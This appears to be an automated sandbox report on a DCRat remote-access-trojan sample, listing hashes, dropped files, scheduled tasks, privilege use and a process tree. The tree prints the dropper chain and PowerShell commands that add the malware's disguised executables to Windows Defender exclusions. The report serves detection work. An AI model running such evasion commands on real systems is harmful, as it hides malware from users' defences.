dcrat | b3ae1056ca2e09e2fe5fdb334b4fcefad475d0fff7abe60e3107df1ad398ca54

Analysis

max time kernel
150s
max time network
152s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
02-02-2023 15:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b3ae1056ca2e09e2fe5fdb334b4fcefad475d0fff7abe60e3107df1ad398ca54.exe
Size

1.3MB
MD5

cffb699ab74c006681aa7de5241801d3
SHA1

904246a101a7bba7a478030a3aac1e40e2d56eab
SHA256

b3ae1056ca2e09e2fe5fdb334b4fcefad475d0fff7abe60e3107df1ad398ca54
SHA512

27d06da54a36b1fab17ea94106d3ec2a0e54e3bafcd40ce76dba0c0b0e6944519f5b81135738ca9132d0ee65bd666cc922b2cdcbfa9169bcaed6c70a3bf2f5d7
SSDEEP

24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Score

10^/10

dcrat infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 45 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4596	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3152	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4384	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4328	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4348	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4572	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5024	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5068	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4940	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4960	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5084	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3700	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4320	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1576	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4364	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4368	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4556	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4380	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4452	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4508	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4500	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4528	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3116	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	500	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4504	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3912	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4668	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1668	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	892	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1448	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1268	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1016	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	996	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	780	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1808	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	528	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3136	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1548	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	96	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	200	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3324	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2192	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2140	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2052	4000	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1856	4000	schtasks.exe

DCRat payload 16 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\providercommon\DllCommonsvc.exe	dcrat
C:\providercommon\DllCommonsvc.exe	dcrat
behavioral1/memory/3784-281-0x0000000000060000-0x0000000000170000-memory.dmp	dcrat
C:\Windows\IME\it-IT\fontdrvhost.exe	dcrat
C:\Windows\IME\it-IT\fontdrvhost.exe	dcrat
C:\Windows\IME\it-IT\fontdrvhost.exe	dcrat
C:\Windows\IME\it-IT\fontdrvhost.exe	dcrat
C:\Windows\IME\it-IT\fontdrvhost.exe	dcrat
C:\Windows\IME\it-IT\fontdrvhost.exe	dcrat
C:\Windows\IME\it-IT\fontdrvhost.exe	dcrat
C:\Windows\IME\it-IT\fontdrvhost.exe	dcrat
C:\Windows\IME\it-IT\fontdrvhost.exe	dcrat
C:\Windows\IME\it-IT\fontdrvhost.exe	dcrat
C:\Windows\IME\it-IT\fontdrvhost.exe	dcrat
C:\Windows\IME\it-IT\fontdrvhost.exe	dcrat
C:\Windows\IME\it-IT\fontdrvhost.exe	dcrat

Executes dropped EXE 13 IoCs

Processes:

DllCommonsvc.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exe

pid	process
3784	DllCommonsvc.exe
4340	fontdrvhost.exe
5380	fontdrvhost.exe
5564	fontdrvhost.exe
5748	fontdrvhost.exe
5928	fontdrvhost.exe
6108	fontdrvhost.exe
4720	fontdrvhost.exe
4792	fontdrvhost.exe
5280	fontdrvhost.exe
676	fontdrvhost.exe
2156	fontdrvhost.exe
60	fontdrvhost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in Program Files directory 4 IoCs

Processes:

DllCommonsvc.exe

description	ioc	process
File created	C:\Program Files\VideoLAN\VLC\skins\fonts\spoolsv.exe	DllCommonsvc.exe
File created	C:\Program Files\VideoLAN\VLC\skins\fonts\f3b6ecef712a24	DllCommonsvc.exe
File created	C:\Program Files (x86)\Internet Explorer\de-DE\fontdrvhost.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Internet Explorer\de-DE\5b884080fd4f94	DllCommonsvc.exe

Drops file in Windows directory 15 IoCs

Processes:

DllCommonsvc.exe

description	ioc	process
File created	C:\Windows\SystemResources\Windows.UI.AccountsControl\PRIS\ea9f0e6c9e2dcd	DllCommonsvc.exe
File created	C:\Windows\debug\dwm.exe	DllCommonsvc.exe
File created	C:\Windows\Cursors\6ccacd8608530f	DllCommonsvc.exe
File created	C:\Windows\Vss\Writers\csrss.exe	DllCommonsvc.exe
File created	C:\Windows\Cursors\Idle.exe	DllCommonsvc.exe
File created	C:\Windows\IME\it-IT\5b884080fd4f94	DllCommonsvc.exe
File created	C:\Windows\Tasks\dllhost.exe	DllCommonsvc.exe
File created	C:\Windows\Tasks\5940a34987c991	DllCommonsvc.exe
File opened for modification	C:\Windows\Vss\Writers\csrss.exe	DllCommonsvc.exe
File created	C:\Windows\debug\6cb0b6c459d5d3	DllCommonsvc.exe
File created	C:\Windows\Branding\ShellBrd\cmd.exe	DllCommonsvc.exe
File created	C:\Windows\Branding\ShellBrd\ebf1f9fa8afd6d	DllCommonsvc.exe
File created	C:\Windows\SystemResources\Windows.UI.AccountsControl\PRIS\taskhostw.exe	DllCommonsvc.exe
File created	C:\Windows\IME\it-IT\fontdrvhost.exe	DllCommonsvc.exe
File created	C:\Windows\Vss\Writers\886983d96e3d3e	DllCommonsvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 45 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	process
892	schtasks.exe
1548	schtasks.exe
1856	schtasks.exe
3152	schtasks.exe
3700	schtasks.exe
4380	schtasks.exe
200	schtasks.exe
2140	schtasks.exe
4320	schtasks.exe
3136	schtasks.exe
96	schtasks.exe
5068	schtasks.exe
4960	schtasks.exe
4528	schtasks.exe
3116	schtasks.exe
500	schtasks.exe
4328	schtasks.exe
4572	schtasks.exe
5024	schtasks.exe
780	schtasks.exe
528	schtasks.exe
2192	schtasks.exe
3912	schtasks.exe
1668	schtasks.exe
1268	schtasks.exe
4596	schtasks.exe
4384	schtasks.exe
2052	schtasks.exe
4368	schtasks.exe
4556	schtasks.exe
4500	schtasks.exe
1808	schtasks.exe
5084	schtasks.exe
1576	schtasks.exe
4364	schtasks.exe
1448	schtasks.exe
4348	schtasks.exe
4508	schtasks.exe
4668	schtasks.exe
1016	schtasks.exe
996	schtasks.exe
3324	schtasks.exe
4940	schtasks.exe
4452	schtasks.exe
4504	schtasks.exe

Modifies registry class 13 IoCs

Processes:

fontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exeb3ae1056ca2e09e2fe5fdb334b4fcefad475d0fff7abe60e3107df1ad398ca54.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings	b3ae1056ca2e09e2fe5fdb334b4fcefad475d0fff7abe60e3107df1ad398ca54.exe
Key created	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings	fontdrvhost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

DllCommonsvc.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exefontdrvhost.exe

pid	process
3784	DllCommonsvc.exe
3784	DllCommonsvc.exe
3784	DllCommonsvc.exe
3784	DllCommonsvc.exe
3784	DllCommonsvc.exe
3784	DllCommonsvc.exe
3784	DllCommonsvc.exe
3784	DllCommonsvc.exe
3784	DllCommonsvc.exe
3784	DllCommonsvc.exe
3784	DllCommonsvc.exe
3784	DllCommonsvc.exe
3784	DllCommonsvc.exe
3784	DllCommonsvc.exe
676	powershell.exe
676	powershell.exe
1852	powershell.exe
1852	powershell.exe
2060	powershell.exe
2060	powershell.exe
2796	powershell.exe
2796	powershell.exe
3744	powershell.exe
3744	powershell.exe
3824	powershell.exe
3824	powershell.exe
2216	powershell.exe
2216	powershell.exe
3692	powershell.exe
3692	powershell.exe
2716	powershell.exe
2716	powershell.exe
4740	powershell.exe
4740	powershell.exe
2216	powershell.exe
3056	powershell.exe
3056	powershell.exe
2640	powershell.exe
2640	powershell.exe
4820	powershell.exe
4820	powershell.exe
1980	powershell.exe
1980	powershell.exe
4052	powershell.exe
4052	powershell.exe
2368	powershell.exe
2368	powershell.exe
3056	powershell.exe
1980	powershell.exe
2216	powershell.exe
2368	powershell.exe
4340	fontdrvhost.exe
4340	fontdrvhost.exe
2060	powershell.exe
1852	powershell.exe
2796	powershell.exe
3744	powershell.exe
3692	powershell.exe
4740	powershell.exe
3824	powershell.exe
676	powershell.exe
676	powershell.exe
4820	powershell.exe
2640	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	3784	DllCommonsvc.exe
Token: SeDebugPrivilege	676	powershell.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeDebugPrivilege	2060	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	3744	powershell.exe
Token: SeDebugPrivilege	3824	powershell.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	4740	powershell.exe
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeDebugPrivilege	4820	powershell.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	4340	fontdrvhost.exe
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeIncreaseQuotaPrivilege	2216	powershell.exe
Token: SeSecurityPrivilege	2216	powershell.exe
Token: SeTakeOwnershipPrivilege	2216	powershell.exe
Token: SeLoadDriverPrivilege	2216	powershell.exe
Token: SeSystemProfilePrivilege	2216	powershell.exe
Token: SeSystemtimePrivilege	2216	powershell.exe
Token: SeProfSingleProcessPrivilege	2216	powershell.exe
Token: SeIncBasePriorityPrivilege	2216	powershell.exe
Token: SeCreatePagefilePrivilege	2216	powershell.exe
Token: SeBackupPrivilege	2216	powershell.exe
Token: SeRestorePrivilege	2216	powershell.exe
Token: SeShutdownPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeSystemEnvironmentPrivilege	2216	powershell.exe
Token: SeRemoteShutdownPrivilege	2216	powershell.exe
Token: SeUndockPrivilege	2216	powershell.exe
Token: SeManageVolumePrivilege	2216	powershell.exe
Token: 33	2216	powershell.exe
Token: 34	2216	powershell.exe
Token: 35	2216	powershell.exe
Token: 36	2216	powershell.exe
Token: SeIncreaseQuotaPrivilege	3056	powershell.exe
Token: SeSecurityPrivilege	3056	powershell.exe
Token: SeTakeOwnershipPrivilege	3056	powershell.exe
Token: SeLoadDriverPrivilege	3056	powershell.exe
Token: SeSystemProfilePrivilege	3056	powershell.exe
Token: SeSystemtimePrivilege	3056	powershell.exe
Token: SeProfSingleProcessPrivilege	3056	powershell.exe
Token: SeIncBasePriorityPrivilege	3056	powershell.exe
Token: SeCreatePagefilePrivilege	3056	powershell.exe
Token: SeBackupPrivilege	3056	powershell.exe
Token: SeRestorePrivilege	3056	powershell.exe
Token: SeShutdownPrivilege	3056	powershell.exe
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeSystemEnvironmentPrivilege	3056	powershell.exe
Token: SeRemoteShutdownPrivilege	3056	powershell.exe
Token: SeUndockPrivilege	3056	powershell.exe
Token: SeManageVolumePrivilege	3056	powershell.exe
Token: 33	3056	powershell.exe
Token: 34	3056	powershell.exe
Token: 35	3056	powershell.exe
Token: 36	3056	powershell.exe
Token: SeIncreaseQuotaPrivilege	1980	powershell.exe
Token: SeSecurityPrivilege	1980	powershell.exe
Token: SeTakeOwnershipPrivilege	1980	powershell.exe
Token: SeLoadDriverPrivilege	1980	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b3ae1056ca2e09e2fe5fdb334b4fcefad475d0fff7abe60e3107df1ad398ca54.exeWScript.execmd.exeDllCommonsvc.exefontdrvhost.execmd.exefontdrvhost.execmd.exefontdrvhost.execmd.exefontdrvhost.execmd.exe

description	pid	process	target process
PID 2692 wrote to memory of 4836	2692	b3ae1056ca2e09e2fe5fdb334b4fcefad475d0fff7abe60e3107df1ad398ca54.exe	WScript.exe
PID 2692 wrote to memory of 4836	2692	b3ae1056ca2e09e2fe5fdb334b4fcefad475d0fff7abe60e3107df1ad398ca54.exe	WScript.exe
PID 2692 wrote to memory of 4836	2692	b3ae1056ca2e09e2fe5fdb334b4fcefad475d0fff7abe60e3107df1ad398ca54.exe	WScript.exe
PID 4836 wrote to memory of 4220	4836	WScript.exe	cmd.exe
PID 4836 wrote to memory of 4220	4836	WScript.exe	cmd.exe
PID 4836 wrote to memory of 4220	4836	WScript.exe	cmd.exe
PID 4220 wrote to memory of 3784	4220	cmd.exe	DllCommonsvc.exe
PID 4220 wrote to memory of 3784	4220	cmd.exe	DllCommonsvc.exe
PID 3784 wrote to memory of 676	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 676	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 1852	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 1852	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 2060	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 2060	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 2796	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 2796	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 3744	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 3744	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 2216	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 2216	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 3824	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 3824	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 2716	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 2716	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 3692	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 3692	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 4740	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 4740	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 3056	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 3056	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 2640	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 2640	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 1980	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 1980	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 4820	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 4820	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 4052	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 4052	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 2368	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 2368	3784	DllCommonsvc.exe	powershell.exe
PID 3784 wrote to memory of 4340	3784	DllCommonsvc.exe	fontdrvhost.exe
PID 3784 wrote to memory of 4340	3784	DllCommonsvc.exe	fontdrvhost.exe
PID 4340 wrote to memory of 2740	4340	fontdrvhost.exe	cmd.exe
PID 4340 wrote to memory of 2740	4340	fontdrvhost.exe	cmd.exe
PID 2740 wrote to memory of 5060	2740	cmd.exe	w32tm.exe
PID 2740 wrote to memory of 5060	2740	cmd.exe	w32tm.exe
PID 2740 wrote to memory of 5380	2740	cmd.exe	fontdrvhost.exe
PID 2740 wrote to memory of 5380	2740	cmd.exe	fontdrvhost.exe
PID 5380 wrote to memory of 5488	5380	fontdrvhost.exe	cmd.exe
PID 5380 wrote to memory of 5488	5380	fontdrvhost.exe	cmd.exe
PID 5488 wrote to memory of 5544	5488	cmd.exe	w32tm.exe
PID 5488 wrote to memory of 5544	5488	cmd.exe	w32tm.exe
PID 5488 wrote to memory of 5564	5488	cmd.exe	fontdrvhost.exe
PID 5488 wrote to memory of 5564	5488	cmd.exe	fontdrvhost.exe
PID 5564 wrote to memory of 5668	5564	fontdrvhost.exe	cmd.exe
PID 5564 wrote to memory of 5668	5564	fontdrvhost.exe	cmd.exe
PID 5668 wrote to memory of 5724	5668	cmd.exe	w32tm.exe
PID 5668 wrote to memory of 5724	5668	cmd.exe	w32tm.exe
PID 5668 wrote to memory of 5748	5668	cmd.exe	fontdrvhost.exe
PID 5668 wrote to memory of 5748	5668	cmd.exe	fontdrvhost.exe
PID 5748 wrote to memory of 5852	5748	fontdrvhost.exe	cmd.exe
PID 5748 wrote to memory of 5852	5748	fontdrvhost.exe	cmd.exe
PID 5852 wrote to memory of 5908	5852	cmd.exe	w32tm.exe
PID 5852 wrote to memory of 5908	5852	cmd.exe	w32tm.exe

C:\Users\Admin\AppData\Local\Temp\b3ae1056ca2e09e2fe5fdb334b4fcefad475d0fff7abe60e3107df1ad398ca54.exe
"C:\Users\Admin\AppData\Local\Temp\b3ae1056ca2e09e2fe5fdb334b4fcefad475d0fff7abe60e3107df1ad398ca54.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2692

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
2⤵
- Suspicious use of WriteProcessMemory
PID:4836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:4220

C:\providercommon\DllCommonsvc.exe
"C:\providercommon\DllCommonsvc.exe"
4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\csrss.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\VideoLAN\VLC\skins\fonts\spoolsv.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Branding\ShellBrd\cmd.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dllhost.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\debug\dwm.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\Idle.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\csrss.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemResources\Windows.UI.AccountsControl\PRIS\taskhostw.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IME\it-IT\fontdrvhost.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\SendTo\spoolsv.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Tasks\dllhost.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\de-DE\fontdrvhost.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368

C:\Windows\IME\it-IT\fontdrvhost.exe
"C:\Windows\IME\it-IT\fontdrvhost.exe"
5⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4340

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\IJ9EkrtYDM.bat"
6⤵
- Suspicious use of WriteProcessMemory
PID:2740

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
7⤵
PID:5060

C:\Windows\IME\it-IT\fontdrvhost.exe
"C:\Windows\IME\it-IT\fontdrvhost.exe"
7⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5380

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\R8cJcUuQgj.bat"
8⤵
- Suspicious use of WriteProcessMemory
PID:5488

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
9⤵
PID:5544

